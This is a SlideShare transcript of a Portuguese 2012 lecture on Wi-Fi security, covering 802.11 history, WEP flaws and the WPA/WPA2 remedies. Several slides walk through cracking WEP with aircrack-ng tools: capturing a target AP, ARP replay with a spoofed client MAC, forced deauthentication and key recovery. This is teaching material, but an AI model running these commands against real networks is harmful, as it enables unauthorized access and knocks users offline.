SlideShare una empresa de Scribd logo

Apresentação flisol2012 prof_joséquaresmafilho

Zé Filho Perfil I
Zé Filho Perfil I
1 de 11
Descargar para leer sin conexión
30/04/2012 • José Quaresma Filho • Técnologo em Redes de Computadores • Especialista em Segurança da Informação • Experiência Profissional (IFPB e Faculdade iDEZ) Atualmente Professor do CST em Redes de Computadores Disciplinas : Segurança de Redes, Práticas em Segurança de Redes, Redes Sem Fio e Redes Móveis Redes Convergentes e Gerência e Desempenho de Redes de Computadores. Coordenador do CST em Redes de Computadores – Faculdade iDEZ Coordenador da Pós-Graduação em Segurança da Informação – Segurança em Redes Sem Fio IEEE 802.11 Faculdade iDEZ Professor da Pós-Graduação (Especialização) em Segurança da Professor: José Quaresma Filho Informação na Faculdade iDEZ e na FIP/I2P Disciplinas: Criptografia e Protocolos Seguros, Segurança da Informação na Realidade dos Negócios, Segurança nas Tecnologias de Trasnmissão. 2009 a 2011 - Administrador de Redes da FUNESC 1993 a 2009 - Administrador de Redes da FAC Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho ENTRE EM CONTATO jose.filho@faculdadeidez.edu.br zefilho@ifpb.edu.br (83) 8852-2274 (83) 9924-8516 Se preferir… Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho ROTEIRO •Introdução •Conceitos de redes Wi-Fi •História do padrão IEEE 802.11 •Principais vulnerabilidades •Principais ataques •Soluções Propostas • WPA (WEP2) e IEEE 802.11i (WPA2) Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 1
30/04/2012 • INTRODUÇÃO: – Definindo o escopo • Redes Sem Fio – Infravermelho IEEE 802.11 – Bluetooth (IEEE 802.15.1) – Zigbee (IEEE 802.15.4) – WI-FI (IEEE 802.11) – WiMAX (IEEE 802.16) Wi-Fi Alliance – Redes Celulares Wi-Fi (Wireless Fidelity) Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho IEEE 802.11 O primeiro padrão aprovado: IEEE std 802.11-1997 1990 Professor: José Gomes Quaresma Filho Substituída pela IEEE Std 802,11- 2007 (Revisão de IEEE Std 802,11- 1.999) Professor: José Gomes Quaresma Filho IEEE std 802.11-1999 IEEE 802.11a Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 2
30/04/2012 IEEE 802.11b IEEE 802.11g Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho IEEE std 802.11i-2004 IEEE std 802.11-2007 Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho IEEE std 802.11n CRONOLOGIA 1997 1997 1999 1999 2004 2009 FHSS DSSS HR/DSSS OFDM OFDM MIMO 802.11 802.11 802.11b 802.11a 802.11g 802.11n (2Mbps) (2Mbps) (11Mbps) (54Mbps) (54Mbps) (108Mbps) 2,4 GHz 5,0 GHz 2,4 GHz 2,4 e 5,0 ISM UNII Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 3
30/04/2012 Faixa UNII (5GHz) root@root:~ # iwlist wlan0 freq wlan0 14 channels in total; available frequences Channel 01 : 2.412 GHz Channel 02 : 2.417 GHz Channel 03 : 2.422 GHz Channel 04 : 2.427 GHz Channel 05 : 2.432 GHz Channel 06 : 2.437 GHz Channel 07 : 2.442 GHz Channel 08 : 2.447 GHz Channel 09 : 2.452 GHz Faixa ISM (2,4GHz) Channel 10 : 2.457 GHz Channel 11 : 2.462 GHz Channel 12 : 2.467 GHz Channel 13 : 2.472 GHz Channel 14 : 2.484 GHz root@root:~ # Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho MODELOS DE REFERÊNCIA APLICAÇÃO APRESENTAÇÃO SESSÃO APLICAÇÃO TRANSPORTE TRANSPORTE REDE INTER-REDES Subcamada LLC ENLACE Subcamada MAC ACESSO À REDE FÏSICA FÍSICA OSI IEEE 802 TCP/IP Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho CONTROLE DE ACESSO • Identificação • Autenticação • Autorização Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 4
30/04/2012 Antes de começar Descubra o chipset da sua placa de rede wireless #lspci | grep Network Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho • Modos de operação das placas wireless – Managed (gerenciado) – Ad-hoc – Monitor (RFMON) – Master (mestre = AP) http://www.backtrack-linux.org/wiki/index.php/Wireless_Drivers#Tested_and_working_cards Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho • iwconfig • iwconfig wlan0 • iwconfig wlan0 mode monitor • airmon-ng start wlan0 Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 5
30/04/2012 Ocultando o ESSID Cliente não “enxerga” a rede Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho #airodump-ng wlan0 Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho WEP Wired Equivalent Privacy Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 6
30/04/2012 Principais características Principais problemas • Usa PSK (Pre Shared Key) • O IV trafega em texto plano • Chaves pré-compartilhadas nas Estações • Com 24 bits (3 bytes) o IV tem 224=16,8 milhões de possibilidades (STAs) e Access Points (Aps) • Numa rede com tráfego de 11 Mpbs – IEEE • Chave WEP 64: IV (24 bits) + Key (40 bits) 802.11b levaria aproximadamente 9h para os IVs • Chave WEP 128: IV (24 bits) + Key (104 bits) começarem a se repetir. • Usa o algoritmo RC4 para cifrar os pacotes • Não existe autenticação do usuário • No modo Open System a autenticação se baseia • O IEEE não determinou uma política para a apenas no SSID troca das chaves • Não há mecanismos para autenticar o AP Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho Principais ataques ao WEP • 2001 - Fluhrer, Mantin e Shamir (estatística) • 2004 – Chopchop (estatística) • 2007 - Pychkine, Tews e Weinmann (PTW força bruta) #aircrack-ng #airmon-ng #aireplay-ng #airodump-ng #airdecap-ng #aircrack-ng Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho Colocando a interface em modo monitor Explorando as vulnerabilidades do WEP Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 7
30/04/2012 Mas será que alguém ainda usa WEP?? # airodump-ng mon0 Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho # airodump-ng --bssid 00:14:D1:49:EA:AE --channel 11 --write captura mon0 Onde: • --bssid : MAC address do AP alvo. • --channel: canal utilizado. • --write: arquivo onde os dados serão gravados. Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho E se o número de pacotes for insuficiente? • Rede com baixo tráfego • Pouco tempo de captura Dados = O • Troca dinâmica da chave WEP Estações conectadas MAC do AP Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 8
30/04/2012 Injetando pacotes na rede Testando a interface # aireplay-ng --test mon0 12:39:40 Trying broadcast probe requests… 12:39:40 Injection is working! 12:39:42 Found 1 AP 12:39:42 Trying direct probe requests… 12:39:42 00:14:D1:49:EA:AE – channel 11 – XXXXXX 12:39:42 Ping (min/avg/max): 1,671 ms/6,987ms/11,453ms Power:- 15,76 12:39:42 30/30: 100% Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho # aireplay-ng --arpreplay -b 00:14:D1:49:EA:AE -h 00:25:CF:89:22:DC mon0 Onde: • -b : MAC address do AP alvo. • -h: MAC address do cliente conectado que será “spoofado”. Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho Tempo = 4 min Dados = 99504 pacotes E se não tiver tráfego ARP ? • Espera uma nova conexão • Força uma desconexão de um cliente #aireplay-ng --deauth 100 –h 00:25:CF:89:22:DC -b 00:14:D1:49:EA:AE mon0 Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 9
30/04/2012 Quebrando a senha # aircrack-ng -z -b 00:14:D1:49:EA:AE captura*.cap Obs: -z Ataque PTW Onde: • -b : MAC address do AP alvo. • captuta*.cap: arquivos onde foram armazenados os pacotes capturados Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho Depois de descobrir a senha o que eu faço?? #airdecap-ng –w KEY –b 00:14:D1:49:EA:AE captura*.cap Chave “secreta” Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho SOLUÇÕES TKIP – key mixing • WPA Personal (2002) – TKIP – geração de chaves aleatórias - função de key mixing – IV de 48 bits -2,8 x 1014 possibilidades – Chave PSK com mínimo de 64 bits – Chave utilizada pelo RC4 de 128 bits – Algoritmo de verificação de integridade do frame - MIC Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 10
30/04/2012 WPA Enterprise • IEEE 802.11i - 2004 • 802.1x – padrão do IEEE para Controle de acesso – Robust Security Networks (RSN): – Funciona em conjunto com Extensible Authentication Protocol (EAP) ou EAPOL – over LAN – Um mecanismo de privacidade de dados, ou seja, • Servidor de Autenticação - Radius um modelo de criptografia de dados utilizando um certo algoritmo. Podem ser utilizados o TKIP com o algoritmo RC4 ou o CCMP com o algoritmo AES – Utilização do IEEE 802.1X para controle de acesso e o gerenciamento de chaves do mesmo IEEE 802.1X para fornecer as chaves ao ponto de acesso e usuário. Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho MUITO OBRIGADO !! • Estabelecimento de um canal seguro entre o ponto de acesso e o servidor de autenticação. • Localizar a rede, negociar os algoritmos de criptografia e associar o algoritmo à rede. • Realizar a autenticação 802.1X com o servidor de autenticação. • Autenticação mutua e estabelecimento das chaves aos pares (para o ponto de acesso e usuário). • Estabelecimento das chaves criptográficas. Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho PERGUNTAS Professor: José Gomes Quaresma Filho 11

Recomendados

Segurança em redes wi-fi: estudo de caso em uma instituição de educação superior
Segurança em redes wi-fi: estudo de caso em uma instituição de educação superiorSegurança em redes wi-fi: estudo de caso em uma instituição de educação superior
Segurança em redes wi-fi: estudo de caso em uma instituição de educação superiorAllan Reis
 
Artigo Pós Graduação - Paulo luis-steinhauser
Artigo Pós Graduação - Paulo luis-steinhauserArtigo Pós Graduação - Paulo luis-steinhauser
Artigo Pós Graduação - Paulo luis-steinhauserPaulo Steinhauser
 
Curso Básico de cabeamento estruturado
Curso Básico de cabeamento estruturadoCurso Básico de cabeamento estruturado
Curso Básico de cabeamento estruturadoJurandir Silva.'.
 
Redes deber 1
Redes deber 1Redes deber 1
Redes deber 1Erick_Salazar
 
Silvio díaz gutiérrez
Silvio díaz gutiérrezSilvio díaz gutiérrez
Silvio díaz gutiérrezSilvio Díaz Gutiérrez
 
Dónde leemos nosotros
Dónde leemos nosotros Dónde leemos nosotros
Dónde leemos nosotros leyads24
 
Times Ascent
Times AscentTimes Ascent
Times AscentSanjeev Dixit
 
Historia del mercado en internet
Historia del mercado en internetHistoria del mercado en internet
Historia del mercado en internetPaul Lpch
 

Recomendados

Segurança em redes wi-fi: estudo de caso em uma instituição de educação superior
Segurança em redes wi-fi: estudo de caso em uma instituição de educação superiorSegurança em redes wi-fi: estudo de caso em uma instituição de educação superior
Segurança em redes wi-fi: estudo de caso em uma instituição de educação superiorAllan Reis
 
Artigo Pós Graduação - Paulo luis-steinhauser
Artigo Pós Graduação - Paulo luis-steinhauserArtigo Pós Graduação - Paulo luis-steinhauser
Artigo Pós Graduação - Paulo luis-steinhauserPaulo Steinhauser
 
Curso Básico de cabeamento estruturado
Curso Básico de cabeamento estruturadoCurso Básico de cabeamento estruturado
Curso Básico de cabeamento estruturadoJurandir Silva.'.
 
Redes deber 1
Redes deber 1Redes deber 1
Redes deber 1Erick_Salazar
 
Silvio díaz gutiérrez
Silvio díaz gutiérrezSilvio díaz gutiérrez
Silvio díaz gutiérrezSilvio Díaz Gutiérrez
 
Dónde leemos nosotros
Dónde leemos nosotros Dónde leemos nosotros
Dónde leemos nosotros leyads24
 
Times Ascent
Times AscentTimes Ascent
Times AscentSanjeev Dixit
 
Historia del mercado en internet
Historia del mercado en internetHistoria del mercado en internet
Historia del mercado en internetPaul Lpch
 
Tcc completo soluções mesh27-mai_2012
Tcc completo soluções mesh27-mai_2012Tcc completo soluções mesh27-mai_2012
Tcc completo soluções mesh27-mai_2012Walton William Ferraz Rocha
 
2 cabeamento estruturado e ambiente de conexão
2 cabeamento estruturado e ambiente de conexão2 cabeamento estruturado e ambiente de conexão
2 cabeamento estruturado e ambiente de conexãoEdmir Tavares de Arruda Junior
 
Apostila redes remotas de computadores
Apostila redes remotas de computadoresApostila redes remotas de computadores
Apostila redes remotas de computadoresfernandao777
 
Apresentação Final - Redes e Telecomunicações
Apresentação Final - Redes e TelecomunicaçõesApresentação Final - Redes e Telecomunicações
Apresentação Final - Redes e TelecomunicaçõesBruno Lins Alves
 
Implemenção_de_Rede_Lan_BRUNO_WALTER_ALPEGA
Implemenção_de_Rede_Lan_BRUNO_WALTER_ALPEGAImplemenção_de_Rede_Lan_BRUNO_WALTER_ALPEGA
Implemenção_de_Rede_Lan_BRUNO_WALTER_ALPEGABrnWltrDaTrnn
 
1 noções básicas de transmissão e meios físicos de rede
1 noções básicas de transmissão e meios físicos de rede1 noções básicas de transmissão e meios físicos de rede
1 noções básicas de transmissão e meios físicos de redeEdmir Tavares de Arruda Junior
 
Apostila de J2ME versão 1.0.pdf
Apostila de J2ME versão 1.0.pdfApostila de J2ME versão 1.0.pdf
Apostila de J2ME versão 1.0.pdfJoberthSilva
 
Apostila de J2ME versão 1.0.pdf
Apostila de J2ME versão 1.0.pdfApostila de J2ME versão 1.0.pdf
Apostila de J2ME versão 1.0.pdfJoberthSilva
 
he15re01
he15re01he15re01
he15re01FlavioCLima
 
Redes 2 padronização e arquitetura de redes
Redes 2 padronização e arquitetura de redesRedes 2 padronização e arquitetura de redes
Redes 2 padronização e arquitetura de redesMauro Pereira
 
gts022003-tutorial-wireless-acme
gts022003-tutorial-wireless-acmegts022003-tutorial-wireless-acme
gts022003-tutorial-wireless-acmeMarcelo Sacchetin
 
Apresentação andré delmas
Apresentação andré delmasApresentação andré delmas
Apresentação andré delmasdanilo oliveira
 
Projeto de Rede Local (LAN)
Projeto de Rede Local (LAN)Projeto de Rede Local (LAN)
Projeto de Rede Local (LAN)Ferramentas Didáticas
 
Tecnologia Ethernet
Tecnologia EthernetTecnologia Ethernet
Tecnologia EthernetHélder Batista
 
Redes de computadores douglas rocha mendes
Redes de computadores douglas rocha mendesRedes de computadores douglas rocha mendes
Redes de computadores douglas rocha mendesWilliam Nascimento
 

Más contenido relacionado

Similar a Apresentação flisol2012 prof_joséquaresmafilho

Apostila redes remotas de computadores
Apostila redes remotas de computadoresApostila redes remotas de computadores
Apostila redes remotas de computadoresfernandao777
 
Apresentação Final - Redes e Telecomunicações
Apresentação Final - Redes e TelecomunicaçõesApresentação Final - Redes e Telecomunicações
Apresentação Final - Redes e TelecomunicaçõesBruno Lins Alves
 
Implemenção_de_Rede_Lan_BRUNO_WALTER_ALPEGA
Implemenção_de_Rede_Lan_BRUNO_WALTER_ALPEGAImplemenção_de_Rede_Lan_BRUNO_WALTER_ALPEGA
Implemenção_de_Rede_Lan_BRUNO_WALTER_ALPEGABrnWltrDaTrnn
 
1 noções básicas de transmissão e meios físicos de rede
1 noções básicas de transmissão e meios físicos de rede1 noções básicas de transmissão e meios físicos de rede
1 noções básicas de transmissão e meios físicos de redeEdmir Tavares de Arruda Junior
 
Apostila de J2ME versão 1.0.pdf
Apostila de J2ME versão 1.0.pdfApostila de J2ME versão 1.0.pdf
Apostila de J2ME versão 1.0.pdfJoberthSilva
 
Apostila de J2ME versão 1.0.pdf
Apostila de J2ME versão 1.0.pdfApostila de J2ME versão 1.0.pdf
Apostila de J2ME versão 1.0.pdfJoberthSilva
 
Redes 2 padronização e arquitetura de redes
Redes 2 padronização e arquitetura de redesRedes 2 padronização e arquitetura de redes
Redes 2 padronização e arquitetura de redesMauro Pereira
 
gts022003-tutorial-wireless-acme
gts022003-tutorial-wireless-acmegts022003-tutorial-wireless-acme
gts022003-tutorial-wireless-acmeMarcelo Sacchetin
 
Apresentação andré delmas
Apresentação andré delmasApresentação andré delmas
Apresentação andré delmasdanilo oliveira
 
Redes de computadores douglas rocha mendes
Redes de computadores douglas rocha mendesRedes de computadores douglas rocha mendes
Redes de computadores douglas rocha mendesWilliam Nascimento
 

Similar a Apresentação flisol2012 prof_joséquaresmafilho (15)

Tcc completo soluções mesh27-mai_2012
Tcc completo soluções mesh27-mai_2012Tcc completo soluções mesh27-mai_2012
Tcc completo soluções mesh27-mai_2012
 
2 cabeamento estruturado e ambiente de conexão
2 cabeamento estruturado e ambiente de conexão2 cabeamento estruturado e ambiente de conexão
2 cabeamento estruturado e ambiente de conexão
 
Apostila redes remotas de computadores
Apostila redes remotas de computadoresApostila redes remotas de computadores
Apostila redes remotas de computadores
 
Apresentação Final - Redes e Telecomunicações
Apresentação Final - Redes e TelecomunicaçõesApresentação Final - Redes e Telecomunicações
Apresentação Final - Redes e Telecomunicações
 
Implemenção_de_Rede_Lan_BRUNO_WALTER_ALPEGA
Implemenção_de_Rede_Lan_BRUNO_WALTER_ALPEGAImplemenção_de_Rede_Lan_BRUNO_WALTER_ALPEGA
Implemenção_de_Rede_Lan_BRUNO_WALTER_ALPEGA
 
1 noções básicas de transmissão e meios físicos de rede
1 noções básicas de transmissão e meios físicos de rede1 noções básicas de transmissão e meios físicos de rede
1 noções básicas de transmissão e meios físicos de rede
 
Apostila de J2ME versão 1.0.pdf
Apostila de J2ME versão 1.0.pdfApostila de J2ME versão 1.0.pdf
Apostila de J2ME versão 1.0.pdf
 
Apostila de J2ME versão 1.0.pdf
Apostila de J2ME versão 1.0.pdfApostila de J2ME versão 1.0.pdf
Apostila de J2ME versão 1.0.pdf
 
he15re01
he15re01he15re01
he15re01
 
Redes 2 padronização e arquitetura de redes
Redes 2 padronização e arquitetura de redesRedes 2 padronização e arquitetura de redes
Redes 2 padronização e arquitetura de redes
 
gts022003-tutorial-wireless-acme
gts022003-tutorial-wireless-acmegts022003-tutorial-wireless-acme
gts022003-tutorial-wireless-acme
 
Apresentação andré delmas
Apresentação andré delmasApresentação andré delmas
Apresentação andré delmas
 
Projeto de Rede Local (LAN)
Projeto de Rede Local (LAN)Projeto de Rede Local (LAN)
Projeto de Rede Local (LAN)
 
Tecnologia Ethernet
Tecnologia EthernetTecnologia Ethernet
Tecnologia Ethernet
 
Redes de computadores douglas rocha mendes
Redes de computadores douglas rocha mendesRedes de computadores douglas rocha mendes
Redes de computadores douglas rocha mendes
 

Apresentação flisol2012 prof_joséquaresmafilho

  • 1. 30/04/2012 • José Quaresma Filho • Técnologo em Redes de Computadores • Especialista em Segurança da Informação • Experiência Profissional (IFPB e Faculdade iDEZ) Atualmente Professor do CST em Redes de Computadores Disciplinas : Segurança de Redes, Práticas em Segurança de Redes, Redes Sem Fio e Redes Móveis Redes Convergentes e Gerência e Desempenho de Redes de Computadores. Coordenador do CST em Redes de Computadores – Faculdade iDEZ Coordenador da Pós-Graduação em Segurança da Informação – Segurança em Redes Sem Fio IEEE 802.11 Faculdade iDEZ Professor da Pós-Graduação (Especialização) em Segurança da Professor: José Quaresma Filho Informação na Faculdade iDEZ e na FIP/I2P Disciplinas: Criptografia e Protocolos Seguros, Segurança da Informação na Realidade dos Negócios, Segurança nas Tecnologias de Trasnmissão. 2009 a 2011 - Administrador de Redes da FUNESC 1993 a 2009 - Administrador de Redes da FAC Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho ENTRE EM CONTATO jose.filho@faculdadeidez.edu.br zefilho@ifpb.edu.br (83) 8852-2274 (83) 9924-8516 Se preferir… Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho ROTEIRO •Introdução •Conceitos de redes Wi-Fi •História do padrão IEEE 802.11 •Principais vulnerabilidades •Principais ataques •Soluções Propostas • WPA (WEP2) e IEEE 802.11i (WPA2) Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 1
  • 2. 30/04/2012 • INTRODUÇÃO: – Definindo o escopo • Redes Sem Fio – Infravermelho IEEE 802.11 – Bluetooth (IEEE 802.15.1) – Zigbee (IEEE 802.15.4) – WI-FI (IEEE 802.11) – WiMAX (IEEE 802.16) Wi-Fi Alliance – Redes Celulares Wi-Fi (Wireless Fidelity) Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho IEEE 802.11 O primeiro padrão aprovado: IEEE std 802.11-1997 1990 Professor: José Gomes Quaresma Filho Substituída pela IEEE Std 802,11- 2007 (Revisão de IEEE Std 802,11- 1.999) Professor: José Gomes Quaresma Filho IEEE std 802.11-1999 IEEE 802.11a Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 2
  • 3. 30/04/2012 IEEE 802.11b IEEE 802.11g Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho IEEE std 802.11i-2004 IEEE std 802.11-2007 Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho IEEE std 802.11n CRONOLOGIA 1997 1997 1999 1999 2004 2009 FHSS DSSS HR/DSSS OFDM OFDM MIMO 802.11 802.11 802.11b 802.11a 802.11g 802.11n (2Mbps) (2Mbps) (11Mbps) (54Mbps) (54Mbps) (108Mbps) 2,4 GHz 5,0 GHz 2,4 GHz 2,4 e 5,0 ISM UNII Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 3
  • 4. 30/04/2012 Faixa UNII (5GHz) root@root:~ # iwlist wlan0 freq wlan0 14 channels in total; available frequences Channel 01 : 2.412 GHz Channel 02 : 2.417 GHz Channel 03 : 2.422 GHz Channel 04 : 2.427 GHz Channel 05 : 2.432 GHz Channel 06 : 2.437 GHz Channel 07 : 2.442 GHz Channel 08 : 2.447 GHz Channel 09 : 2.452 GHz Faixa ISM (2,4GHz) Channel 10 : 2.457 GHz Channel 11 : 2.462 GHz Channel 12 : 2.467 GHz Channel 13 : 2.472 GHz Channel 14 : 2.484 GHz root@root:~ # Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho MODELOS DE REFERÊNCIA APLICAÇÃO APRESENTAÇÃO SESSÃO APLICAÇÃO TRANSPORTE TRANSPORTE REDE INTER-REDES Subcamada LLC ENLACE Subcamada MAC ACESSO À REDE FÏSICA FÍSICA OSI IEEE 802 TCP/IP Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho CONTROLE DE ACESSO • Identificação • Autenticação • Autorização Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 4
  • 5. 30/04/2012 Antes de começar Descubra o chipset da sua placa de rede wireless #lspci | grep Network Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho • Modos de operação das placas wireless – Managed (gerenciado) – Ad-hoc – Monitor (RFMON) – Master (mestre = AP) http://www.backtrack-linux.org/wiki/index.php/Wireless_Drivers#Tested_and_working_cards Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho • iwconfig • iwconfig wlan0 • iwconfig wlan0 mode monitor • airmon-ng start wlan0 Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 5
  • 6. 30/04/2012 Ocultando o ESSID Cliente não “enxerga” a rede Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho #airodump-ng wlan0 Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho WEP Wired Equivalent Privacy Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 6
  • 7. 30/04/2012 Principais características Principais problemas • Usa PSK (Pre Shared Key) • O IV trafega em texto plano • Chaves pré-compartilhadas nas Estações • Com 24 bits (3 bytes) o IV tem 224=16,8 milhões de possibilidades (STAs) e Access Points (Aps) • Numa rede com tráfego de 11 Mpbs – IEEE • Chave WEP 64: IV (24 bits) + Key (40 bits) 802.11b levaria aproximadamente 9h para os IVs • Chave WEP 128: IV (24 bits) + Key (104 bits) começarem a se repetir. • Usa o algoritmo RC4 para cifrar os pacotes • Não existe autenticação do usuário • No modo Open System a autenticação se baseia • O IEEE não determinou uma política para a apenas no SSID troca das chaves • Não há mecanismos para autenticar o AP Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho Principais ataques ao WEP • 2001 - Fluhrer, Mantin e Shamir (estatística) • 2004 – Chopchop (estatística) • 2007 - Pychkine, Tews e Weinmann (PTW força bruta) #aircrack-ng #airmon-ng #aireplay-ng #airodump-ng #airdecap-ng #aircrack-ng Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho Colocando a interface em modo monitor Explorando as vulnerabilidades do WEP Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 7
  • 8. 30/04/2012 Mas será que alguém ainda usa WEP?? # airodump-ng mon0 Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho # airodump-ng --bssid 00:14:D1:49:EA:AE --channel 11 --write captura mon0 Onde: • --bssid : MAC address do AP alvo. • --channel: canal utilizado. • --write: arquivo onde os dados serão gravados. Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho E se o número de pacotes for insuficiente? • Rede com baixo tráfego • Pouco tempo de captura Dados = O • Troca dinâmica da chave WEP Estações conectadas MAC do AP Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 8
  • 9. 30/04/2012 Injetando pacotes na rede Testando a interface # aireplay-ng --test mon0 12:39:40 Trying broadcast probe requests… 12:39:40 Injection is working! 12:39:42 Found 1 AP 12:39:42 Trying direct probe requests… 12:39:42 00:14:D1:49:EA:AE – channel 11 – XXXXXX 12:39:42 Ping (min/avg/max): 1,671 ms/6,987ms/11,453ms Power:- 15,76 12:39:42 30/30: 100% Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho # aireplay-ng --arpreplay -b 00:14:D1:49:EA:AE -h 00:25:CF:89:22:DC mon0 Onde: • -b : MAC address do AP alvo. • -h: MAC address do cliente conectado que será “spoofado”. Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho Tempo = 4 min Dados = 99504 pacotes E se não tiver tráfego ARP ? • Espera uma nova conexão • Força uma desconexão de um cliente #aireplay-ng --deauth 100 –h 00:25:CF:89:22:DC -b 00:14:D1:49:EA:AE mon0 Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 9
  • 10. 30/04/2012 Quebrando a senha # aircrack-ng -z -b 00:14:D1:49:EA:AE captura*.cap Obs: -z Ataque PTW Onde: • -b : MAC address do AP alvo. • captuta*.cap: arquivos onde foram armazenados os pacotes capturados Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho Depois de descobrir a senha o que eu faço?? #airdecap-ng –w KEY –b 00:14:D1:49:EA:AE captura*.cap Chave “secreta” Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho SOLUÇÕES TKIP – key mixing • WPA Personal (2002) – TKIP – geração de chaves aleatórias - função de key mixing – IV de 48 bits -2,8 x 1014 possibilidades – Chave PSK com mínimo de 64 bits – Chave utilizada pelo RC4 de 128 bits – Algoritmo de verificação de integridade do frame - MIC Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho 10
  • 11. 30/04/2012 WPA Enterprise • IEEE 802.11i - 2004 • 802.1x – padrão do IEEE para Controle de acesso – Robust Security Networks (RSN): – Funciona em conjunto com Extensible Authentication Protocol (EAP) ou EAPOL – over LAN – Um mecanismo de privacidade de dados, ou seja, • Servidor de Autenticação - Radius um modelo de criptografia de dados utilizando um certo algoritmo. Podem ser utilizados o TKIP com o algoritmo RC4 ou o CCMP com o algoritmo AES – Utilização do IEEE 802.1X para controle de acesso e o gerenciamento de chaves do mesmo IEEE 802.1X para fornecer as chaves ao ponto de acesso e usuário. Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho MUITO OBRIGADO !! • Estabelecimento de um canal seguro entre o ponto de acesso e o servidor de autenticação. • Localizar a rede, negociar os algoritmos de criptografia e associar o algoritmo à rede. • Realizar a autenticação 802.1X com o servidor de autenticação. • Autenticação mutua e estabelecimento das chaves aos pares (para o ponto de acesso e usuário). • Estabelecimento das chaves criptográficas. Professor: José Gomes Quaresma Filho Professor: José Gomes Quaresma Filho PERGUNTAS Professor: José Gomes Quaresma Filho 11